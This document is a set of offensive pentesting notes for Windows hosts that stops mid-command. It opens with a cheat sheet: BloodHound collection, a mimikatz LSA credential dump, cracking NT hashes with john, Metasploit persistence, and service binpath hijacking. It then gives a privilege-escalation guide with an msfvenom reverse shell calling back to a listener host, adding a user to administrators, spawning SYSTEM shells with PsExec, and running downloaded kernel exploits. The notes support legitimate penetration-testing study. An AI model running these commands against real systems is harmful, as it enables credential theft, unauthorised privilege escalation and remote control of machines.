Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN -ZipFileName loot.zip

mimikatz.exe
> privilege::debug
> lsadump::lsa /patch
john crack.me --wordlist=~/wordlists/rockyou.txt --format=NT

use exploit/windows/local/persistence
set session 1

# INSECURE SERVICE PERMISSIONS
C:\PrivEsc\accesschk.exe /accepteula -uwcqv USER SERVICE
sc qc SERVICE
sc config SERVICE binpath= "PATH"
net start daclsvc

# UNQUOTED SERVICE PATH
sc qc SERVICE
accesschk.exe /accepteula -uwdq "PATH"
copy SHELL "PATH"
net start SERVICE
--------------------------------------------------------------------------------
/Pentesting Windows Hosts/Windows Privilege Escalation.md:
--------------------------------------------------------------------------------
# Spawning Administrator Shells

## msfvenom

If we can execute commands with admin privileges, a reverse shell generated by msfvenom works nicely:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f exe -o reverse.exe
```

This reverse shell can be caught using netcat or Metasploit's own multi/handler.

## RDP

Alternatively, if RDP is available (or we can enable it), we can add our low privileged user to the administrators group and then spawn an administrator command prompt via the GUI.

```
net localgroup administrators USER /add
```

## Admin -> SYSTEM

To escalate from an admin user to full SYSTEM privileges, you can use the PsExec tool from Windows Sysinternals: [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).

```
.\PsExec64.exe -accepteula -i -s C:\PrivEsc\reverse.exe
```

# Manual enumeration

## System enumeration

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
wmic qfe
wmic logicaldisk get caption,description,providername
```

## User enumeration

```
whoami
whoami /priv
whoami /groups
net user
net user USER
net localgroup
net localgroup GROUP
```

## Network enumeration

```
ipconfig
ipconfig /all
arp -a
route print
netstat -ano
```

## Firewall and AV enumeration

```
sc query windefend
sc queryex type= service
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
```

# Privilege Escalation Tools

## winPEAS

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Compiled releases can be found here:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases

Before running, we need to add a registry key and then reopen the command prompt:

```
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
```

Run all checks while avoiding time-consuming searches:

```
.\winPEASany.exe quiet cmd fast
```

Run specific check categories:

```
.\winPEASany.exe quiet cmd systeminfo
```

## PowerUp & SharpUp

PowerUp & SharpUp are very similar tools that hunt for specific privilege escalation misconfigurations.

PowerUp: https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

SharpUp: https://github.com/GhostPack/SharpUp

Pre-Compiled SharpUp: https://github.com/r3motecontrol/GhostpackCompiledBinaries/blob/master/SharpUp.exe

To run PowerUp, start a PowerShell session and use dot sourcing to load the script:

```
. .\PowerUp.ps1
```

Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations.

```
Invoke-AllChecks
```

To run SharpUp, start a command prompt and run the executable:

```
.\SharpUp.exe
```

SharpUp should immediately start checking for the same misconfigurations as PowerUp.

## Seatbelt

Seatbelt is an enumeration tool. It contains a number of enumeration checks.

It does not actively hunt for privilege escalation misconfigurations, but provides related information for further investigation.

Code: https://github.com/GhostPack/Seatbelt

Pre-Compiled: https://github.com/r3motecontrol/GhostpackCompiledBinaries/blob/master/Seatbelt.exe

To run all checks and filter out unimportant results:

```
.\Seatbelt.exe all
```

To run specific check(s):

```
.\Seatbelt.exe …
```

## accesschk.exe

AccessChk is an old but still trustworthy tool for checking user access control rights.

You can use it to check whether a user or group has access to files, directories, services, and registry keys.

The downside is that more recent versions of the program spawn a GUI "accept EULA" popup window. When using the command line, we have to use an older version which still has an /accepteula command line option.

# Kernel Exploits

Finding and using kernel exploits is usually a simple process:

1. Enumerate Windows version / patch level (systeminfo).
2. Find matching exploits (Google, ExploitDB, GitHub).
3. Compile and run.

Beware though, as kernel exploits can often be unstable and may be one-shot or cause a system crash.

## Tools

Windows Exploit Suggester: https://github.com/bitsadmin/wesng

Precompiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits

Watson: https://github.com/rasta-mouse/Watson

## Exploitation

1. Extract the output of the systeminfo command:
```
systeminfo > systeminfo.txt
```
2. Run wesng to find potential exploits:
```
python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
```
3. Cross-reference results with compiled exploits: https://github.com/SecWiki/windows-kernel-exploits
4. Download the compiled exploit.
5. Start a listener on Kali and run the exploit, providing it with the reverse shell executable, which should run with SYSTEM privileges:
```
.\x64.exe C:\PrivEsc\reverse.exe
```

# Service Exploits

## Service Commands

Query the configuration of a service:
```
sc.exe qc SERVICE
```
Query the current status of a service:
```
sc.exe query SERVICE
```
Modify a configuration option of a service:
```
sc.exe config